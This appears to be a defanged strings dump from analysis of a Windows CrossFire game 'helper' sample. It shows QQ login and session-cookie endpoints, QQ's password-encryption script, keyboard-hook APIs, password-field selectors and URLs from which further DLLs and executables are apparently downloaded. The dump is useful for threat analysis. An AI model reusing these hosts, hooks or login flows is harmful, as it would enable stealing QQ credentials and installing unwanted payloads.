hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=54963&callback=vipSignNew.signCb&g_tk=
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fxinyue.qq.com%2Fweb201410%2Fwebgame.shtml&eas_refer=http%3A%2F%2Fxinyue.qq.com%2Fweb201410%2Fwebgame.shtml&sServiceDepartment=xinyue&sServiceType=tgclub
Referer: hXXp://xinyue.qq.com/comm-htdocs/js/milo/ajaxcdr.swf?0.7271989360451698
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=21547&sServiceDepartment=xinyue&set_info=xinyue
hXXp://starvip.qq.com/fcg-bin/v2/fcg_mobile_starvip_site_checkin?g_tk=
&_=1454839692917
hXXp://x.pet.qq.com/vip_platform?cmd=set_sign_info&timer=1454839703753&callback=jQuery110205429354978259653_1454839692914&token=
msg": "
&pvsrc=102&s_p=0|http|&s_v=6.1.0.496&ozid=511022&vipid=&actid=68391&sid=&callback=json14530355412865&cache=3654
hXXp://iyouxi.vip.qq.com/ams3.0.php?g_tk=
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4
hXXp://proxy.vac.qq.com/cgi-bin/srfentry.fcgi?ts=1456988761581&g_tk=
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13D15 QQ/6.2.2.402 Pixel/640 NetType/WIFI Mem/86
&_=1452520903377
hXXp://pay.video.qq.com/fcgi-bin/sign?callback=jQuery111006800204519842937_1452520903238&low_login=1&uin=
hXXp://buluo.qq.com/cgi-bin/bar/card/bar_list_by_page
hXXp://buluo.qq.com/cgi-bin/bar/user/sign
hXXp://qun.qzone.qq.com/cgi-bin/get_group_list?uin=
hXXp://qiandao.qun.qq.com/cgi-bin/new_flag
hXXp://qiandao.qun.qq.com/cgi-bin/sign
hXXp://c.pc.qq.com/fcgi-bin/signin?callback=jsonp1453084008086&_=1453084046097&mood_id=238&checkin_date=&remark=一支穿云箭 千军万马来相见。
08 08 08 50
hXXp://cfzhushou.com/cfzs/help.html
hXXp://cfzhushou.com/help.html
hXXp://VVV.cfzhushou.com/cfzs/help.html
hXXp://ip.qq.com/cgi-bin/myip
hXXps://aq.qq.com/cn2/safe_service/device_lock
hXXp://ossweb-img.qq.com/images/clientpop/act/cf/GpmHelpAct.js
http2://ossweb
hXXp://ossweb
"img":"http2(.*?).jpg"
"hXXp://(.*?)":{
"~ /1~!<
fD.nn'1r?
.KM8'
$&%cw]
hXXp://leesin.zuhaowan.com-
hXXp://leesin.zuhaowan.cn
hXXp://captcha.qq.com/getimage?aid=210001040.5721703316085041
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=41615&sServiceDepartment=group_f
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=qqgame&iActivityId=41615&sServiceDepartment=group_h&set_info=group_h
hXXp://webd.tgp.qq.com/cf/info_proxy/weapon_stat_info?&&zone_id=
1970.01.01 08:00:00
function timea(){var d,s;d=new Date();d.setTime('
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=55856&sServiceDepartment=group_f
hXXp://apps.game.qq.com/cf/a20160726hxb/getUserTask.php?action=getMyTaskList&iArea=
Referer:hXXp://cf.qq.com/act/a20160726hxb/index.htm
hXXp://apps.game.qq.com/daoju/appmarket/daoju_promotion/cloud_ticket/QueryCloudTicket.php?acctid=A100078&id=28&time=0.23177661886438727&_=1461381268102
"sMsg":"MODULE OK"
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fbang.qq.com%2Fshop%2Findex%2Fcf%2F&eas_refer=http%3A%2F%2Fbang.qq.com%2Fmain%2Ftradeinfo%2F&sServiceDepartment=xinyue
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=tgclub&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=38135&iFlowId=
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=38135&sServiceDepartment=xinyue&set_info=xinyue
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=tgclub&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=38135&iFlowId=214216&g_tk=
|322|
*&checkparam=cf|yes|
&ams_checkparam=cf|yes|
sCdKey=
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=8918&sServiceDepartment=x1m1
sMsg" : "
\gzip.dll
`.data
gzip.pdb
_u%SV
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
hXXp://apps.game.qq.com/cgi-bin/cf/a20090409forceout/getinfo.cgi
hXXp://VVV.cfzhushou.com/app/
hXXp://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=21000124&s_url=hXXp://cf.qq.com&style=34
hXXps://ssl.ptlogin2.qq.com/ptqrshow?appid=21000124&e=2&l=M&s=3&d=72&v=4&t=0.8120921131107115&daid=8
hXXps://ssl.ptlogin2.qq.com/ptqrlogin?u1=hXXp://cf.qq.com&ptqrtoken=#{ptqrtoken}&ptredirect=1&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=0-1-1491575693107&js_ver=10210&js_type=1&login_sig=#{login_sig}&pt_uistyle=40&aid=21000124&daid=8&has_onekey=1&
#{login_sig}
('0','0','
&js_ver=10210&js_type=1&login_sig=4I5ZCJhgOyvHYIR7edjyKchOesPKbLWadY1YKeoQHyTQu63TEXeJCdU6UZgyOeKv&pt_uistyle=34&aid=549000912&
hXXps://ssl.ptlogin2.qq.com/ptqrlogin?u1=hXXps://qzone.qq.com&ptredirect=1&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=0-0-
for(var e=0,i=0,n=t.length;n>i;++i)
e+=(e<<5)+t.charCodeAt(i);
hXXps://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=21000124&s_url=hXXp://cf.qq.com/comm-htdocs/login/logincallback.htm&style=34
hXXp://cf.qq.com/cfvip/
hXXp://xinyue.qq.com
o%%co
``PBi %c
<\-M}*0_
{56FDF344-FD6D-11d0-958A-006097C9A090}
{EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF}
Report
themepassword
SysShadow.HostWnd
{6AEDBD6D-3FB5-418A-83A6-7F45229DC872}
VBScript.RegExp
1970-01-01 00:00:00
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: image/gif, image/bmp, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
background(?:-image)?:.*?[\s]*?url[\s]*?\([#
']?(.*?)[#
onkeydown|
onkeyup|
onkeypress|
wA{0002DF05-0000-0000-C000-000000000046}
{D30C1661-CDAF-11D0-8A3E-00C04FC9E26E}
{6D5140C1-7436-11CE-8034-00AA006009FA}
text|password|file
?)-D%f`
location.reload()
window.location.href="
{25336920-03F9-11CF-8FD0-00AA00686F13}
hXXp://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js
document.all.retjs.innerText=
javascript:document.body.contentEditable='true';document.designMode='on';void 0;
javascript:document.body.contentEditable='false';document.designMode='on';void 0;
javascript:document.onsdragstart=document.onselectstart=document.oncontextmenu=function(){return true}
javascript:document.onselectstart = document.oncontextmenu = document.onmousedown = document.onkeydown = function(){return true;};
WarnOnHTTPSToHTTPRedirect
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
type=password
[password]
var jies = document.getElementsByTagName('object');for(var jie in jies){if(jies[jie].classid=='clsid:D27CDB6E-AE6D-11cf-96B8-444553540000'){jies[jie].removeNode(true);}}
user.qzone.qq.com
mail.qq.com
onkeyup
type='password'
type="password"
, 1, , ,
var jie = document.createStyleSheet();jie.addRule('html','
').value="
document.getElementById('
LocationURL
{34A715A0-6587-11D0-924A-0020AFC7AC4D}
window.location.reload()
var jie = document.createStyleSheet();jie.addRule('html','overflow:hidden;');
{557CF400-1A04-11D3-9A73-0000F81EF32E}
{557CF401-1A04-11D3-9A73-0000F81EF32E}
{557CF402-1A04-11D3-9A73-0000F81EF32E}
{557CF405-1A04-11D3-9A73-0000F81EF32E}
{557CF406-1A04-11D3-9A73-0000F81EF32E}
SysShadow.Menu
Microsoft.XMLDOM
HKEY_CURRENT_CONFIG
14:00~16:00
12:00-19:00
1.2.18
%*.*f
MSWHEEL_ROLLMSG
WSOCK32.dll
msscript.ocx
VVV.dywt.com.cn
USER32.DLL
\\.\Smartvsd
\\.\PhysicalDrive%d
\\.\Scsi%d:
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
;3 #>6.&
'2, / 0&7!4-)1#
(*.htm;*.html)|*.htm;*.html
its:%s::%s
(*.avi)|*.avi
WPFT532.CNV
WPFT632.CNV
EXCEL32.CNV
write32.wpc
Windows Write
mswrd632.wpc
Word for Windows 6.0
wword5.cnv
Word for Windows 5.0
mswrd832.cnv
mswrd632.cnv
Word 6.0/95 for Windows & Macintosh
html32.cnv
.PAVCOleException@@
.PAVCOleDispatchException@@
right-curly-bracket
left-curly-bracket
0123456789
c:\%original file name%.exe
GetKeyboardState
InternetCanonicalizeUrlA
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level="requireAdministrator" uiAccess="false"/> </requestedPrivileges> </security></trustInfo></assembly>
AVIFIL32.dll
MSVFW32.dll
oledlg.dll
RASAPI32.dll
1.0.15.507
T%Program Files%\NamuADLook.dll
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
VVV.kubei9.com
VVV.kubei9.com
1.3.6.1
(*.*)
1.0.0.0
6.0.2600.0 (xpclient.010817-1148)
6.0.2600.0
2.6.1.0
VVV.cfzhushou.com

%original file name%.exe_4032_rwx_00401000_0050A000:

t$(SSh
~%UVW
u$SShe
Hw2.Hw
wininet.dll
ole32.dll
kernel32.dll
user32.dll
User32.dll
Kernel32.dll
shell32.dll
gdiplus.dll
GdiPlus.dll
ntdll.dll
Ole32.dll
OleAut32.dll
oleaut32.dll
gzip.dll
gdi32.dll
Gdi32.dll
imm32.dll
OLEACC.DLL
advapi32.dll
shlwapi.dll
atl.dll
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
MsgWaitForMultipleObjects
GetProcessHeap
ShellExecuteA
GetAsyncKeyState
GdipSetStringFormatHotkeyPrefix
RegisterHotKey
UnregisterHotKey
GetUrlCacheEntryInfoA
RegCloseKey
RegCreateKeyA
RegOpenKeyA
GetWindowsDirectoryA
GdiplusShutdown
RegEnumKeyA
RegQueryInfoKeyA
RegFlushKey
RegOpenKeyExA
RegCreateKeyExA
RegDeleteKeyA
&pt_randsalt=0&u1=http://cf.qq.com/cp/a20160217cfyj/index.htm?e_code=213271&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-4-1457704626950&js_ver=10151&js_type=1&login_sig=&pt_uistyle=32&aid=21000124&daid=8&
hXXp://ptlogin2.qq.com/login?u=
&s_url=http://cf.qq.com/comm-htdocs/login/logincallback.htm&f_url=&ptlang=2052&ptredirect=100&aid=21000124&daid=8&j_later=0&low_login_hour=0&regmaster=0&pt_login_type=1&pt_aid=0&pt_aaid=0&pt_light=0&pt_3rd_aid=0
&service=login&nodirect=0&ptsigx=
hXXp://ptlogin4.game.qq.com/check_sig?pttype=1&uin=
p_skey=
skey=
xlogin
login2
pt_login_sig=
[pt_login_sig]
https
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
http=
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
hXXps://
hXXp://
function time(){return Math.random()}
if (e) for (var n = 0; n < t.length; n  ) i[n] = 255 & t.charCodeAt(n);
n = 0; n < t.length; n  = 2) i[o  ] = parseInt(t.substr(n, 2), 16);
for (var i = h(t, e), n = a(i), o = "", r = 0; r < n.length; r  ) o  = String.fromCharCode(n[r]);
return q.encode(o)
initkey: function(t, e) {
q.PADCHAR = "=",
q.ALPHA = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /",
q.getbyte = function(t, e) {
var i = t.charCodeAt(e);
q.encode = function(t) {
if (1 != arguments.length) throw "SyntaxError: Not enough arguments";
var e, i, n = q.PADCHAR,
o = q.ALPHA,
r = q.getbyte,
var s = t.length - t.length % 3;
if (0 == t.length) return t;
p.push(o.charAt(i >> 18)),
p.push(o.charAt(i >> 12 & 63)),
p.push(o.charAt(i >> 6 & 63)),
p.push(o.charAt(63 & i));
switch (t.length - s) {
p.push(o.charAt(i >> 18)   o.charAt(i >> 12 & 63)   n   n);
p.push(o.charAt(i >> 18)   o.charAt(i >> 12 & 63)   o.charAt(i >> 6 & 63)   n)
return p.join("")
window.btoa || (window.btoa = q.encode)
return binl2hex(core_md5(str2binl(t), t.length * chrsz))
return binl2str(core_md5(str2binl(t), t.length * chrsz))
p = 0; p < t.length; p  = 16) {
i.length > 16 && (i = core_md5(i, t.length * chrsz));
var p = core_md5(n.concat(str2binl(e)), 512   e.length * chrsz);
return core_md5(o.concat(p), 640)
for (var e = Array(), i = (1 << chrsz) - 1, n = 0; n < t.length * chrsz; n  = chrsz) e[n >> 5] |= (t.charCodeAt(n / chrsz) & i) << n % 32;
i = (1 << chrsz) - 1, n = 0; n < 32 * t.length; n  = chrsz) e  = String.fromCharCode(t[n >> 5] >>> n % 32 & i);
for (var e = hexcase ? "0123456789ABCDEF": "0123456789abcdef", i = "", n = 0; n < 4 * t.length; n  ) i  = e.charAt(t[n >> 2] >> n % 4 * 8   4 & 15)   e.charAt(t[n >> 2] >> n % 4 * 8 & 15);
n = 0; n < 4 * t.length; n  = 3) for (var o = (t[n >> 2] >> 8 * (n % 4) & 255) << 16 | (t[n   1 >> 2] >> 8 * ((n   1) % 4) & 255) << 8 | t[n   2 >> 2] >> 8 * ((n   2) % 4) & 255, r = 0; 4 > r; r  ) i  = 8 * n   6 * r > 32 * t.length ? b64pad: e.charAt(o >> 6 * (3 - r) & 63);
for (var arr = [], i = 0; i < str.length; i  = 2) arr.push("\\x"   str.substr(i, 2));
return arr = arr.join(""),
if (! (Math.random() > (e || 1))) try {
var i = location.protocol   "//ui.ptlogin2.qq.com/cgi-bin/report?id="   t,
n = document.createElement("img");
n.src = i
for (var o = n ? t: md5(t), r = hexchar2bin(o), p = md5(r   e), s = RSA.rsa_encrypt(r), a = (s.length / 2).toString(16), c = TEA.strToBytes(i.toUpperCase(), !0), l = Number(c.length / 2).toString(16); l.length < 4;) l = "0"   l;
for (; a.length < 4;) a = "0"   a;
TEA.initkey(p);
var u = TEA.enAsBase64(a   s   TEA.strToBytes(e)   l   c);
u = u.replace(/[\/\ =]/g,function(t) {return {"/": "-"," ": "*","=": "_"} [t]});
u.replace(/[\/\ =]/g,
"/": "-",
" ": "*",
"=": "_"
o = n   e.toUpperCase(),
r = $.RSA.rsa_encrypt(o);
for (var hex = str.toString(16), len = hex.length, i = len; maxLength > i; i  ) hex = "0"   hex;
for (var arr = [], j = 0; maxLength > j; j  = 2) arr.push("\\x"   hex.substr(j, 2));
var result = arr.join("");
%Program Files%\Internet Explorer\iexplore.exe
%d-d-d d:d:d
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=
"sMsg":"
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=
@1970-01-01 08:00:00
ptlogin2
cf.qq.com
hXXp://login.game.qq.com/comm-cgi-bin/login/LoginReturnInfo.cgi?callback=jsonp21&game=cf
nickName":"
hXXp://q.qlogo.cn/headimg_dl?bs=qq&dst_uin=
-URL:
hXXp://apps.game.qq.com/cgi-bin/cf/userinfo/userinfo.cgi?ssn=
<P class=msg>
MsgBox
SysShadow.SubWnd
[VVV.111Ttt.com]
?kernel32.dll
crossfire.exe
\exdui.dll
.rsrc
@V.Dv
.UmKm
4v %u
oft.XMLDOMnY
\dwmapi.dll
A715A0-6587-11D0-924A_20AFC7/
Leave.CoIn@alize
number is %d.
:"%s"
..0`%X
KERNEL32.DLL
ADVAPI32.dll
ATL.DLL
GDI32.dll
MSVCRT.dll
OLEAUT32.dll
SHELL32.dll
SHLWAPI.dll
USER32.dll
exdui.dll
t=.VMV
%%fnW
,7Z.in
k`%u"]
T.ZQ2
CDKEY
CDKEY:
ND ED9MS?WC [H6WU<fL.aF6bB=dM2aN<iE?hO1jL=jP.gP4cP>iQ4kU;mX>qN?EJILOPMSFMRSWKEVYGWYW[_bXcI]dV^bciIDeRAbUMeYNkTChVLmZEm\KhYTrNHsYJ{ZTo`LefYir^saKtcTsd\ti[{eTzf]}iV{k]fhhhkqmtfmqsyiewtivxxz}
ND ED9MS?WB [H6WU<eL-bM;jP.cP>qN?EJILNPMSEMRSVKFVXGVYW[^aXcI]dV]bciIEeSAcVMfZEe[MkTChVLmZEm\JhYTrMGsYJ{ZTeaIgeYir^saKtcTsd\viWui\{eTze]|iU{k\~p_fihhkqlsgmqtyiextjuxxz}
ND EE9LS?WC [I7WT<eL.bM;jP/dP>qN?EJILOPMTDMRSWJE[OTWXFWYWZ^bXcI]dV]bciIEjXEhYUrMGrZIzZTh^aeaIgeYir^saKxgX~p_fhhilrmsgmqtyidslsytjvxxz|
OB EE9LR?WC [I7WT<eL.bM:iP/dQ>qN?EJILOPMTDMRSWIE[OTWXFWYX[^aXcI]dV]bciJEjXEhYUrNGr[IzZTh^bfaIgdYir^saKxgX~p_fhhjlrmsgmqtyidslsysjvxxz|
OB FE9KR?WC [I7WT<eL.bM:iP/dQ>qN?EJIKOPMTDMRSWIE\ORWXFWYX[^aXcI]dV]bciJEjXEhYUrNHr[IzZTh^bfaIhdYir^saKxgX~p_fhhjlrmsgnrtyjeslsysjvxxz|
MB,EE9KR?WC [I7WT<fL.bM:iP/dQ=qN?EJIKOPMTCMRSWHE\NSWXFWYX[^aXcI]dV]bciJEjXEhYUrNHr[IzZTg^bfaIhdZir^saJxgX~p_fhhjmrmrhnqtxjermtzsjvxxz|
MB,EE9KR?WC [I7WT<fL.bM:iP/dQ=qN?EJIKOPMTCMRRWHE[NSWXFWYX[^aXcI]dV]bciJE`ORjXEhYVqNHr\IyZTg^bfaIhdZir^saJwgX~p_fhhjmrmrhnrtxjerlszsivxxz|
MB,EE9KR?WC [I7WT<fL.bM:iP/dQ=qN?EJIKOPMTCMRRWHE[OSWXFWYXZ^aXcI]dV]bbiJE`ORjXEhYVqNHr\IyZTg^bfaIhdZir^saJwgX~p_fhhjmrmrhnrtxjerlszsjvxxz|
wW.Gg
NA EE9KR?WC [I7WT<fL.bM:iP/dQ=qN?EJIKOPMTCMRRWHE[OSWXFWYX[^aXcI]dV]bbiJE`ORjYEhYVqNHr\IyZTg^bfaIhdZir^saJwgX~p_fhhkmrmrhnrtxjerlszsjvxxz|
NA FE9KR?WC [I7WT<fL.bM:iP/dQ=qN?EJIKOPMTCMRRWHE\OSWXFWYX[^aXcI]dV]bbiJE`ORjYEhYVqNIr\IyZTg^bfaIhdZir^saJwgX~p_fhhkmrmrhnrtxjerlszsjvxxz|
Z|.Gw
MA,FE9KR?WC*[I7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWXFWYX[^aXcI]dV]bbiJE`ORjYEhYVqNIr\IyZTg^bfaIhdZir^saJwgX~p_fhhkmrnrhnrtxjerlszsjvxxz|
MA,FE9KR?WC*ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWXFWYXZ^aXcI]dV]bbiJE`ORjYEhYVqNIr\IyZTg^bfaIhdZir^saJwgX~p_fhhkmrnrhnrtxjerlszsivxxz|
MA,EE9KR?WC*ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWXFWYXZ^aXcI]dV]bbiJE`ORjYEhYVqNIr\IyZTg^bfaIhdZir^saJwgX~p_fhhkmrnqhnrtxjerlszsjvxxz|
NA,FE9KR?WC*ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[OSWXFWYX[^aXcI]dW]bbiJE`ORjYEhYVqNIr\IyZTg^bfaIhdZir^saJwgX~p_fhhkmrnqhnrtxjerlszsjvxxz|
NA,FE9KR?WC*ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE\NSWXFWYX[^aXcI]dW]bbiJE`ORjYEhYVqNIr\IyZTg^bfaIhcZir^saJwgX~p_fhhkmrnqhnrtxjerlszsjvxxz|
l.er;
MA,FE9KR?WC*ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWXFWYX[^aXcI]dW]bbiJE`ORjYEhYVqNIr\IyYTg^bfaIhcZir^saJwgX~p_fhhkmrnqinrtxjerlszsjvxyz|
MA,FE9KR?WC*ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUBMRRWHE[NSWXFWYXZ^aXcI]dW]bbiJE`ORjYEhYVqNIr\IyYTg^bfaIhcZir^saJwgX~p_fhhkmrnqinrtxjerlszsivxxz|
8`!%x
MA,FE9KR?WC*ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWXFWYXZ^aXcI]dV]bbiJE`ORjYEhYVqNIr\IyZTg^bfaIhcZir^saJwgX~p_fhhkmrnqinrtxjerlszsivxxz|
MA,FE9KR?WC ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWXFWYXZ^aXcI]dV]bciJE`ORjYEhYVqNIr\IyZTg^bfaIhdYir_saJwgX|p_fhhkmrnqinrtxjerlszsivxxz|
MA,FE9KR?WC ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eV]bciJE`ORcOQjYEhYVqNIr\IyZTg^bfaIidYir_saJwgXzq^fhhkmrnqinrtxjerlszsivxyz|
MA,FE9KR?WC ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eV]bciJE`ORcOQjXEhYVqNIr\IyZTg^bfaIidYir_saJwgXzr^fhhkmrnqinrtxjerlszsivxyz|
MA,FE9KR?WC ZI7WT<fL.bM:iP/dQ>qN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eU]bciJE`ORcOQjXEhYVqNIr\IyZTg^bfaIidXir_saJwgXzr^fhhkmrnqinrtyjerlszsivxyz|
MA,FE9KR?WC ZI7WT<fL.bM:iP/dQ>qN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eU]bciJE`ORcOQjXEhYVrNIr\IyZTg^bfaIidXir_saJwgXyr^fhhkmrnqinrtyjerlszshvxyz|
MA,FE9KR?WC ZI7WT<fL.bM;iP/dQ>qN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eU]bciJE`ORcOQjXEhZVrNIr\IyZTg^bfaIidXir_saJwgXyr^fhhkmrnqinrtyjerlszshvxyz|
.pQ\ a
.NaH-*
!)!!))!)-*1-(333:73_
%XE%Z
dj%d~
.PXF3
02/24/16
ÏYP
%4u3\2t
W.ctn
XX.ce
{Z,c
.ijWU5
w%SY<s
Wkbn%X
kEYH
&.kPd
(s.PKL
>%fZM
T2%xE
dQ]%U
#.mkTSx
.Ag.~
%f%%f
7".Fv
>.OsM
r.vDO
V2.6.1
\CF_data.ini
hXXp://VVV.baidu.com/
hXXp://blog.163.com/leesin_2017/blog/static/26727603220161118442467/
hXXp://note.youdao.com/yws/public/note/9eecf8d4c685cad98cef71bfc32bee84?keyfrom=public
hXXp://xinzyw.com/cf.txt
hXXp://cfzhushou.com/cf.txt
hXXp://VVV.cfzhushou.com
.text
`.rdata
@.data
help.dll
\help.dll
@.reloc
%Program Files%\sesvcs_%d_56089.exe
sesvcs_%d_56089.exe
hXXp://down.9udn.com/aload/as/33.txt
%Program Files%\23.txt
%Program Files%\NamuADLook.dll
hXXp://xzdownad.zglhsw.com/aload/cp/NamuADLook.dll
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
operator
GetProcessWindowStation
C:\Users\Administrator\Documents\Tencent Files\1148797355\FileRecv\DLL
\xxx\Helper.pdb
Helper.dll
KERNEL32.dll
InternetCrackUrlA
HttpQueryInfoW
WININET.dll
GetCPInfo
zcÁ
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>
7.84888<8@8
6 696?6{6
14686<6@6
5 5(50585
? ?$?,?@?`?
>$>0>4>8><>
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
iphlpapi.dll
MPR.dll
WINMM.dll
WS2_32.dll
VERSION.dll
WinExec
GetKeyState
GetViewportOrgEx
WINSPOOL.DRV
COMCTL32.dll
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
.PAVCException@@
Shell32.dll
Mpr.dll
Advapi32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
#include "l.chs\afxres.rc" // Standard components
cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>PADPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPA